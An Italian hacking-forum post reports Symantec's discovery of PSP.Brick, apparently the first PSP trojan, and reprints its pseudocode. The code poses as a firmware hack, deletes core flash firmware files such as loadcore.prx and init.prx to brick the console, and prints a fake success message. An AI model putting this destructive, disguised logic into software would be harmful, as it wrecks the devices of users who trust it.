GeneralHacking

PSP.Brick - Il primo virus per PSP

« Older   Newer »
  Share  
DarkHero02
view post Posted on 9/4/2011, 20:51




image

Symantec ha individuato quello che è senz’altro il primo virus per PSP. Si tratta di un trojan, di conseguenza va deliberatamente installato dagli utenti. PSPBrick, questo il nome del trojan, almeno per il momento non viene indicato come un rischio dai creatori di Norton Antivirus (è un categoria 1, su 5 livelli di pericolosità).
Che sia di prossima esplosione il business degli antivirus per PSP?

Fonte: www.gamesblog.it/post/706/pspbrick-il-primo-virus-per-psp

Fonte 2: http://www.joystiq.com/2005/10/06/first-ps...alyzing-threat/

Pseudo-Codice del Virus

HTML
1.
_start:
2.
call main()
3.
while(1)
4.

5.
sceIoAssign:
6.
syscall 0x20a8
7.

8.
sceIoRemove:
9.
syscall 0x209e
10.

11.
main:
12.
call FillVram(0)
13.
call Print(1,1,0xFFFFFF,"PSP TEAM 2.0 Exploit Hack the 2.0 firmware")
14.
call Print(1,2,0xFFFFFF,"Thank 's to toc2rta for the 2.0 exploit :) ")
15.
call sceIoAssign("flash6:", "lflash0:0,0", "flashfat2:", 0, 0, 0)
16.
call sceIoRemove("flash6:/vsh/etc/index.dat")
17.
call sceIoRemove("flash6:/kd/loadcore.prx")
18.
call sceIoRemove("flash6:/kd/loadexec.prx")
19.
call sceIoRemove("flash6:/kd/init.prx")
20.
call Print(1,4,0xFFFFFF," Your 2.0 is hacked please reboot ")
21.
call Print(1,5,0xFFFFFF," Thank you PSP Team the french team")
22.
call Print(1,6,0xFFFFFF," **** yoshihiro and SonyxTeam Looser")


Fonte codice: http://forums.qj.net/psp-homebrew-hacks-di...am-bricker.html
 
Top
0 replies since 9/4/2011, 20:51   146 views
  Share